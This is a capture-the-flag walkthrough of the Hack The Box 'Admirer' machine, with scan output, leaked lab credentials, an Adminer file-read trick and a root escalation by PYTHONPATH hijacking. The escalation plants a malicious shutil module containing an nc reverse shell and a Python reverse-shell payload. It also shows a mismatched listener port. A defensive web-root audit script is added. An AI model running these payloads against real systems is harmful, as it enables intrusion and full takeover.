NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-31 21:19 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:19
Completed NSE at 21:19, 0.00s elapsed
Initiating NSE at 21:19
Completed NSE at 21:19, 0.00s elapsed
Initiating NSE at 21:19
Completed NSE at 21:19, 0.00s elapsed
Initiating Ping Scan at 21:19
Scanning 10.10.10.187 [4 ports]
Completed Ping Scan at 21:19, 0.35s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:19
Completed Parallel DNS resolution of 1 host. at 21:19, 0.58s elapsed
Initiating SYN Stealth Scan at 21:19
Scanning 10.10.10.187 [1000 ports]
Discovered open port 21/tcp on 10.10.10.187
Discovered open port 22/tcp on 10.10.10.187
Discovered open port 80/tcp on 10.10.10.187
Increasing send delay for 10.10.10.187 from 0 to 5 due to 103 out of 257 dropped probes since last increase.
Increasing send delay for 10.10.10.187 from 5 to 10 due to 140 out of 349 dropped probes since last increase.
SYN Stealth Scan Timing: About 41.43% done; ETC: 21:20 (0:00:44 remaining)
Completed SYN Stealth Scan at 21:22, 172.70s elapsed (1000 total ports)
Initiating Service scan at 21:22
Scanning 3 services on 10.10.10.187
Completed Service scan at 21:22, 5.00s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.187
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Retrying OS detection (try #2) against 10.10.10.187
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
adjust_timeouts2: packet supposedly had rtt of -350641 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -350641 microseconds.  Ignoring time.
Initiating Traceroute at 21:23
Completed Traceroute at 21:23, 2.03s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 21:23
Completed Parallel DNS resolution of 2 hosts. at 21:23, 3.49s elapsed
NSE: Script scanning 10.10.10.187.
Initiating NSE at 21:23
Completed NSE at 21:24, 50.50s elapsed
Initiating NSE at 21:24
Completed NSE at 21:24, 5.01s elapsed
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
Nmap scan report for 10.10.10.187
Host is up (2.0s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE    VERSION
21/tcp open  tcpwrapped
22/tcp open  tcpwrapped
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open  tcpwrapped
Aggressive OS guesses: Android 4.1.1 (95%), Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), Android 4.1.2 (94%), Android 4.2.2 (Linux 3.4) (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.13 (94%), Linux 4.10 (94%), Linux 4.4 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 554/tcp)
HOP RTT     ADDRESS
1   3.83 ms 10.10.14.1
2   3.82 ms 10.10.10.187

NSE: Script Post-scanning.
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
Initiating NSE at 21:24
Completed NSE at 21:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 288.03 seconds
           Raw packets sent: 4389 (197.784KB) | Rcvd: 3533 (159.868KB)

Note that all three ports come back as tcpwrapped with no version string. Nmap reports that when the TCP handshake completes but the connection is closed before any data is read; here the flaky link (2.0s latency, dropped probes, the OS detection retries) is the more likely cause than TCP wrappers on the host, and the FTP banner later identifies vsFTPd 3.0.3, so a rescan of just these three ports once the link is stable would fill in the versions.
PORT 80
Let's move on to robots.txt. Here we have admin-dir listed, which returns Forbidden. After fuzzing it I got 2 directories:
Contacts
##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb
##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb
# Amy
Email: a.bialik@admirer.htb
# Leonard
Email: l.galecki@admirer.htb
#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb
# Bernadette
Email: b.rauch@admirer.htb
Credentials
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P
[FTP account]
ftpuser
%n?4Wz}R$tTF7
[Wordpress account]
admin
w0rdpr3ss01!
Here we got the FTP username and password!
FTP LOGINS AND ENUMERATION
root@liquid:~/Desktop/HTB/admirerC# ftp 10.10.10.187
Connected to 10.10.10.187.
220 (vsFTPd 3.0.3)
Name (10.10.10.187:root): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            3405 Dec 02 21:24 dump.sql
-rw-r--r--    1 0        0         5270987 Dec 03 21:20 html.tar.gz
226 Directory send OK.
ftp> get *
local: credentials.txt remote: *
200 PORT command successful. Consider using PASV.
550 Failed to open file.
ftp> mget *
mget dump.sql?
mget html.tar.gz?
Here we have two files available. After checking both, here is what we got!!!
html file
root@liquid:~/Desktop/HTB/admirerC/html# ls -la
total 36
drwxr-xr-x 6 root root     4096 May  5 17:52 .
drwxr-xr-x 3 root root     4096 May 29 15:15 ..
drwxr-x--- 6 root www-data 4096 Jun  7  2019 assets
drwxr-x--- 4 root www-data 4096 Dec  3 01:59 images
-rw-r----- 1 root www-data 4613 Dec  4 01:50 index.php
-rw-r----- 1 root www-data  134 Dec  2 03:01 robots.txt
drwxr-x--- 2 root www-data 4096 Dec  2 23:20 utility-scripts
drwxr-x--- 2 root www-data 4096 Dec  2 22:55 w4ld0s_s3cr3t_d1r
The utility-scripts directory is interesting. After going through it we got another web directory to check.
utility-scripts
root@liquid:~/Desktop/HTB/admirerC/html/utility-scripts# ls -l
total 16
-rw-r----- 1 root www-data 1795 Dec  2 23:18 admin_tasks.php
-rw-r----- 1 root www-data  401 Dec  2 03:58 db_admin.php
-rw-r----- 1 root www-data   20 Nov 30  2019 info.php
-rw-r----- 1 root www-data   53 Dec  2 23:10 phptest.php
We have a number of files here, and some of them contain passwords. But the main thing we learn is that there is a database on this box!!
Let's fuzz for more files under utility-scripts:
root@liquid:~/Desktop/HTB/admirerC/html/utility-scripts# wfuzz -w /usr/share/wordlists/big.txt -u http://admirer.htb/utility-scripts/FUZZ.FUZ2Z -z list,php --hc 403,404 -c

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************

Target: http://admirer.htb/utility-scripts/FUZZ.FUZ2Z
Total requests: 20592

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000001873:   200        51 L     235 W    4156 Ch     "adminer - php"
Here we got adminer.php.
Now we need an exploit!!
After some google-fu I found a write-up!!
https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool
Here we have an exploit for Adminer!!
For that we need to create a user and a database of our own, because the Adminer login is pointed at a MySQL server we control!!
Here are the links for creating the user and database
After creating the database we can log in like this!!
root@liquid:~/Desktop/HTB/admirerC# mysql -u new adminer -p
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 59
Server version: 10.3.22-MariaDB-1 Debian buildd-unstable

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [adminer]>
Then log in to adminer.php.
Let's try to access the /etc/passwd file!
But we get a "Path error"!
So let's try to access index.php, which is just one directory up from utility-scripts.
Here we go!!
Again with some passwords!!
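Before moving on, here is a defender's check for the three things this section turned up: robots.txt advertising a hidden directory, credentials sitting in a text file under the web root, and a database admin tool (adminer.php) left reachable. This is an added example for this write-up, not code from the box or from its author; the web root it scans is constructed in a temporary directory to mirror the layout seen above, with placeholder content and no real password. The script file names it looks for come from the listings above plus the common phpinfo.php.

```python
import os
import re
import tempfile

# Admin/debug scripts that should not be reachable in a public web root.
# Names come from the listings above, plus the common phpinfo.php.
ADMIN_OR_DEBUG_SCRIPTS = {"adminer.php", "db_admin.php", "info.php",
                          "phptest.php", "phpinfo.php"}

# Loose markers for credential dumps left behind in text-like files.
CRED_MARKERS = re.compile(
    r"password|passwd|\[(ftp|internal mail|wordpress) account\]", re.I)
TEXT_SUFFIXES = (".txt", ".sql", ".bak", ".old", ".orig")


def parse_robots_disallow(text):
    """Return the Disallow: paths listed in a robots.txt body."""
    paths = []
    for line in text.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() == "disallow" and value.strip():
            paths.append(value.strip())
    return paths


def audit_webroot(root):
    """Walk a web root and report the three weaknesses seen in this section."""
    findings = []
    robots = os.path.join(root, "robots.txt")
    if os.path.isfile(robots):
        with open(robots, encoding="utf-8", errors="replace") as f:
            for p in parse_robots_disallow(f.read()):
                # A Disallow entry only matters when the path really exists:
                # it then advertises the hidden directory to anyone who looks.
                if os.path.exists(os.path.join(root, p.strip("/"))):
                    findings.append(("robots_discloses_existing_path", p))
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if name.lower() in ADMIN_OR_DEBUG_SCRIPTS:
                findings.append(("admin_or_debug_script_in_webroot", rel))
            if name.lower().endswith(TEXT_SUFFIXES):
                with open(full, encoding="utf-8", errors="replace") as f:
                    if CRED_MARKERS.search(f.read()):
                        findings.append(("credential_like_text_file", rel))
    return sorted(findings)


def build_sample_webroot(root):
    """Constructed layout mirroring the box: the directory named in
    robots.txt, a credentials file inside it, and Adminer under
    utility-scripts. The password value is a placeholder, not the real one."""
    layout = {
        "index.php": "<?php echo 'Admirer'; ?>\n",
        "robots.txt": "User-agent: *\nDisallow: /admin-dir\n",
        "admin-dir/credentials.txt": "[FTP account]\nftpuser\nPASSWORD-PLACEHOLDER\n",
        "utility-scripts/adminer.php": "<?php /* adminer stand-in */ ?>\n",
    }
    for rel, body in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as f:
            f.write(body)


def demo():
    """Build the sample web root in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_webroot(tmp)
        return audit_webroot(tmp)


if __name__ == "__main__":
    for kind, where in demo():
        print(f"{kind}: {where}")
```

Run it against a real document root (`audit_webroot("/var/www/html")`) as the web server user: anything it reports is readable by that user, which is exactly the set of files an Adminer-style file read or a stray tarball on FTP would expose.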
SSH WALDO USER ACCESS
root@liquid:~/Desktop/HTB/admirerC# ssh waldo@10.10.10.187
waldo@10.10.10.187's password:
Linux admirer 4.9.0-12-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun May 31 17:18:37 2020 from 10.10.14.185
waldo@admirer:~$ id
uid=1000(waldo) gid=1000(waldo) groups=1000(waldo),1001(admins)
GETTING ROOT ACCESS
Let's use the basic command to check!!
waldo@admirer:~$ sudo -l
[sudo] password for waldo:
Matching Defaults entries for waldo on admirer:
    env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always

User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh
waldo@admirer:~$
After running that script and reading it with cat, I came to know what each of its menu options runs. In that directory we have 2 files!!
waldo@admirer:/opt/scripts$ ls -l
total 8
-rwxr-xr-x 1 root admins 2613 Dec  2 20:36 admin_tasks.sh
-rwxr----- 1 root admins  198 Dec  2 20:36 backup.py
waldo@admirer:/opt/scripts$
Here we see that backup.py calls the function make_archive, which it imports from shutil (a Python standard library module). This backup script is what option 6 (Backup web data) runs. Because the sudo rule carries the SETENV tag, waldo may set environment variables on the sudo command line even though env_reset is in effect, so PYTHONPATH can be pointed at a directory of our own. If that directory contains a module named shutil, the backup script imports our module instead of the standard one, and since the script runs as root, the make_archive we define (a reverse shell) is executed by root.
waldo@admirer:~/liquid$ cat shutil.py
import os
def make_archive(a,s,d):
    os.system("nc 10.10.14.140 9003 -e /bin/sh")
waldo@admirer:~/liquid$
Now let's pass this path as PYTHONPATH and run the script!! But remember to open the listener first!!
waldo@admirer:~/liquid$ sudo PYTHONPATH=~/liquid /opt/scripts/admin_tasks.sh

[[[ System Administration Menu ]]]
1) View system uptime
2) View logged in users
3) View crontab
4) Backup passwd file
5) Backup shadow file
6) Backup web data
7) Backup DB
8) Quit
Choose an option: 6
Running backup script in the background, it might take a while...

Here we got root access!!

root@liquid:~/Desktop/HTB/admirer# nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.140] from (UNKNOWN) [10.10.10.187] 46778
root@admirer:/home/waldo/liquid# cd
cd
root@admirer:~# id
id
uid=0(root) gid=0(root) groups=0(root)
NOTE: we can also use this other Python module to get a shell, as I did above:
waldo@admirer:~/liquid$ cat shutil1.py
import os
import pty
import socket

lhost = "10.10.14.140"
lport = 9002

# Placeholder names; nothing in this module uses them itself.
ZIP_DEFLATED = 0
class ZipFile:
    def close(*args):
        return
    def write(*args):
        return
    def __init__(self, *args):
        return

# Module body runs at import time: connect back, wire stdin/stdout/stderr
# to the socket and hand over a bash pty.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
os.putenv("HISTFILE", '/dev/null')
pty.spawn("/bin/bash")
s.close()
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
BEST WRITE UP EVER SEEN